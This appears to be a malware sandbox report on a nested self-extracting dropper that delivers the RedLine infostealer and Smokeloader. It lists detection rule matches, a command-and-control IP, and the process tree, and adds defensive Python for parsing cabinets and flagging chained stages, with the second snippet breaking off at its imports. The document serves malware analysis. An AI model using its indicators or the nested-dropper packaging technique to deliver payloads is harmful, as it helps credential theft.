0000000A.00000002.364130402.00000000027C9000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000395F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknown | TCP traffic detected without corresponding DNS query: 193.233.20.24 (37 connections observed)
                    Source: caQi43qE17.exe, 0000000A.00000002.363496581.00000000008BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    Source: 10.2.caQi43qE17.exe.4a80ee8.5.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.7e6cce.2.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.4b50000.6.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.7e6cce.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 0.3.file.exe.50d5420.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.4b50000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 0.3.file.exe.50d5420.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.4a80000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.4a80000.4.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.3.caQi43qE17.exe.941a70.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.4a80ee8.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.7e7bb6.3.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.3.caQi43qE17.exe.941a70.1.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.7e7bb6.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 10.2.caQi43qE17.exe.680e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                    Source: 0000000A.00000002.362811186.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                    Source: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe, type: DROPPED | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00173BA2
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00175C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Code function: 1_2_00393BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Code function: 1_2_00395C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Code function: 2_2_00133BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Code function: 2_2_00135C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Code function: 3_2_00FD3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Code function: 3_2_00FD5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00408C60
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_0040DC11
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00407C3F
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00418CCC
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00406CA0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_004028B0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_0041A4BE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00418244
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00401650
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00402F20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_004193C4
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00418788
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00402F89
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_00402B90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_004073A0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_008D6090
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_024620C8
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_02461DAA
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_02461DB8
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: 10_2_050DECC8
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exe B873395D8B0B53E7C0F6192AE48A129253F4D592A58919DDE8668B9D3FA9EB33
                    Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 10.2.caQi43qE17.exe.4a80ee8.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.7e6cce.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.4b50000.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.7e6cce.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.file.exe.50d5420.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.4b50000.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.file.exe.50d5420.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.4a80000.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.4a80000.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.3.caQi43qE17.exe.941a70.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.4a80ee8.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.7e7bb6.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.3.caQi43qE17.exe.941a70.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.7e7bb6.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.caQi43qE17.exe.680e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 0000000A.00000002.362811186.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe, type: DROPPED | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00171F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Code function: 1_2_00391F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Code function: 2_2_00131F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Code function: 3_2_00FD1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe | Code function: String function: 0040E1D8 appears 44 times
                    Source: file.exe | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 889758 bytes, 2 files, at 0x2c +A "pluT14Nj54.exe" +A "grWB27Fb84.exe", ID 2298, number 1, 34 datablocks, 0x1503 compression
                    Source: pluT14Nj54.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 749822 bytes, 2 files, at 0x2c +A "plct23La85.exe" +A "fuYn3946BI92.exe", ID 2432, number 1, 31 datablocks, 0x1503 compression
                    Source: grWB27Fb84.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: plct23La85.exe.1.dr | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 520188 bytes, 2 files, at 0x2c +A "plvy67MJ29.exe" +A "diIN97YY43.exe", ID 2311, number 1, 20 datablocks, 0x1503 compression
                    Source: plvy67MJ29.exe.2.dr | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 241390 bytes, 2 files, at 0x2c +A "buze36rj14.exe" +A "caQi43qE17.exe", ID 2371, number 1, 10 datablocks, 0x1503 compression
                    Source: file.exe, 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                    Source: file.exe, 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMoues.exe< vs file.exe
                    Source: file.exe | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                    Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
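                    The RT_RCDATA resources above are Microsoft Cabinet archives nested one inside the next (file.exe carries pluT14Nj54.exe, which carries plct23La85.exe, and so on), which is how a WEXTRACT self-extractor packages its payload. The Python below is an added example, not part of the Joe Sandbox report, showing how the CFHEADER/CFFOLDER/CFFILE structures yield the fields printed above ("at 0x2c", "ID 2298", "datablocks", "0x1503 compression") without decompressing anything: it scans a carrier for MSCF signatures, rejects stray matches, and lists each cabinet's members. The cabinet it parses is constructed inline with illustrative member names; nothing in it is taken from the analysed sample.

```python
# Static walk of a WEXTRACT cabinet: locate MSCF cabinets inside a carrier and
# list their members without decompressing. Added example with a constructed cabinet.
import struct
from typing import List, NamedTuple

CAB_SIGNATURE = b"MSCF"
CFHDR_PREV_CABINET = 0x0001      # CFHEADER flag bits (MS-CAB specification)
CFHDR_NEXT_CABINET = 0x0002
CFHDR_RESERVE_PRESENT = 0x0004
FILE_ATTRIB_ARCHIVE = 0x20       # printed as "+A" by file(1)
COMPRESSION_NAMES = {0: "none", 1: "MSZIP", 2: "Quantum", 3: "LZX"}


class CabFile(NamedTuple):
    name: str
    size: int
    folder: int
    attribs: int


class CabInfo(NamedTuple):
    offset: int          # where the cabinet starts inside the carrier
    size: int            # cbCabinet
    set_id: int          # setID ("ID" in the file(1) output)
    cabinet_index: int   # iCabinet ("number")
    files_offset: int    # coffFiles ("at 0x..")
    datablocks: int      # CFDATA blocks summed over all folders
    compression: str     # first folder's typeCompress, decoded
    files: List[CabFile]


def _cstring(buf: bytes, pos: int):
    end = buf.index(b"\x00", pos)          # ValueError if unterminated
    return buf[pos:end].decode("latin-1"), end + 1


def describe_compression(type_compress: int) -> str:
    kind = COMPRESSION_NAMES.get(type_compress & 0x000F, "unknown")
    if kind == "LZX":
        # bits 8..12 hold the LZX window size as a power of two (15..21); 0x1503 -> 2^21
        return f"LZX (window 2^{(type_compress >> 8) & 0x1F})"
    return kind


def parse_cab(buf: bytes, base: int = 0) -> CabInfo:
    if buf[base:base + 4] != CAB_SIGNATURE:
        raise ValueError(f"no MSCF signature at {base:#x}")
    # reserved1, cbCabinet, reserved2, coffFiles, reserved3, versionMinor, versionMajor,
    # cFolders, cFiles, flags, setID, iCabinet  (36-byte header including the signature)
    (cb_cabinet, coff_files, ver_minor, ver_major, c_folders, c_files,
     flags, set_id, i_cabinet) = struct.unpack_from("<4xI4xI4xBBHHHHH", buf, base + 4)
    if (ver_major, ver_minor) != (1, 3):
        raise ValueError("unsupported cabinet version")
    pos, folder_reserve = base + 36, 0
    if flags & CFHDR_RESERVE_PRESENT:       # optional per-header / per-folder reserve areas
        cb_header, folder_reserve, _cb_data = struct.unpack_from("<HBB", buf, pos)
        pos += 4 + cb_header
    for flag in (CFHDR_PREV_CABINET, CFHDR_NEXT_CABINET):
        if flags & flag:                    # szCabinetPrev/Next, szDiskPrev/Next
            _, pos = _cstring(buf, pos)
            _, pos = _cstring(buf, pos)
    folders, datablocks = [], 0
    for _ in range(c_folders):              # CFFOLDER: coffCabStart, cCFData, typeCompress
        _coff_start, c_data, type_compress = struct.unpack_from("<IHH", buf, pos)
        folders.append(type_compress)
        datablocks += c_data
        pos += 8 + folder_reserve
    files, pos = [], base + coff_files
    for _ in range(c_files):                # CFFILE: cbFile, uoffFolderStart, iFolder, date, time, attribs, szName
        size, _uoff, i_folder, _date, _time, attribs = struct.unpack_from("<IIHHHH", buf, pos)
        name, pos = _cstring(buf, pos + 16)
        files.append(CabFile(name, size, i_folder, attribs))
    compression = describe_compression(folders[0]) if folders else "n/a"
    return CabInfo(base, cb_cabinet, set_id, i_cabinet, coff_files, datablocks, compression, files)


def find_cabinets(carrier: bytes) -> List[CabInfo]:
    """Scan raw bytes (e.g. a PE image) for embedded cabinets. Stray 'MSCF' strings are
    dropped when the header does not parse or claims a size that cannot fit."""
    found, pos = [], 0
    while (pos := carrier.find(CAB_SIGNATURE, pos)) >= 0:
        try:
            info = parse_cab(carrier, pos)
            if 36 < info.files_offset < info.size <= len(carrier) - pos:
                found.append(info)
                pos += info.size
                continue
        except (struct.error, ValueError):
            pass
        pos += 4
    return found


def summarize(info: CabInfo) -> str:
    """Render the fields the way file(1) prints them for a cabinet."""
    names = " ".join(("+A " if f.attribs & FILE_ATTRIB_ARCHIVE else "") + f'"{f.name}"' for f in info.files)
    return (f"Microsoft Cabinet archive data, {info.size} bytes, {len(info.files)} files, "
            f"at {info.files_offset:#x} {names}, ID {info.set_id}, number {info.cabinet_index}, "
            f"{info.datablocks} datablocks, {info.compression}")


def build_sample_cab() -> bytes:
    """Constructed one-folder cabinet with two member entries (illustrative names).
    The single CFDATA block is filler; nothing is ever decompressed."""
    members = [(b"stage2.exe", 1000), (b"payload.exe", 2000)]
    cffiles, uoff = b"", 0
    for name, size in members:
        cffiles += struct.pack("<IIHHHH", size, uoff, 0, 0x5600, 0, FILE_ATTRIB_ARCHIVE) + name + b"\x00"
        uoff += size
    cfdata = struct.pack("<IHH", 0, 8, 16) + b"\xAA" * 8       # csum, cbData, cbUncomp, payload
    coff_files = 36 + 8                                         # header + one CFFOLDER -> 0x2c
    coff_data = coff_files + len(cffiles)
    total = coff_data + len(cfdata)
    header = CAB_SIGNATURE + struct.pack("<IIIIIBBHHHHH", 0, total, 0, coff_files, 0,
                                         3, 1, 1, len(members), 0, 2298, 1)
    cffolder = struct.pack("<IHH", coff_data, 1, 0x1503)        # LZX, 2 MiB window
    return header + cffolder + cffiles + cfdata


if __name__ == "__main__":
    # Constructed carrier: fake MZ stub, the cabinet, then a stray "MSCF" that must be ignored.
    carrier = b"MZ" + b"\x00" * 100 + build_sample_cab() + b"MSCF" + b"\x00" * 4
    for cab in find_cabinets(carrier):
        print(f"cabinet at {cab.offset:#x}: {summarize(cab)}")
```

                    Run against a real dropper, the same scan over the PE's raw bytes finds the resource-embedded cabinet; pulling the members out and repeating the scan on each one walks the chain shown above (file.exe to pluT14Nj54.exe to plct23La85.exe to plvy67MJ29.exe) without executing any stage.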
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\buze36rj14.exe.log
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@15/10@0/1
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe | Code function: 4_2_00007FFBACE61B10 ChangeServiceConfigA
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00174FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA
                    Source: file.exe | ReversingLabs: Detection: 64%
                    Source: file.exe | Virustotal: Detection: 54%
                    Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe
                    Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe
                    Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                    Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                    Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe | Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe
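                    The process tree above is the footprint of chained WEXTRACT (IExpress) self-extractors: each stage unpacks its cabinet into %TEMP%\IXPnnn.TMP, starts the next stage from that folder, and a rundll32 advpack.dll,DelNodeRunDLL32 call deletes the folder afterwards. The Python below is an added example, not part of the Joe Sandbox report, that applies this pattern to process-creation records: a stage's depth is its IXP-resident parent's depth plus one, so a single legitimate IExpress package stays below the threshold while a self-extractor spawned from inside another IXP folder is reported, and DelNodeRunDLL32 cleanups of IXP folders are listed alongside. The record layout (Image, ParentImage, CommandLine) and the sample events, modeled on the tree above plus a benign single-stage package, are constructed here and not drawn from the sandbox's raw logs; the report lists the parent of file.exe and of the rundll32 instances as unknown, which the sample keeps as an empty string.

```python
# Flag chained WEXTRACT/IExpress self-extractors in process-creation records.
# Added example; the event records are constructed to mirror the report's tree.
import re
from typing import Dict, List

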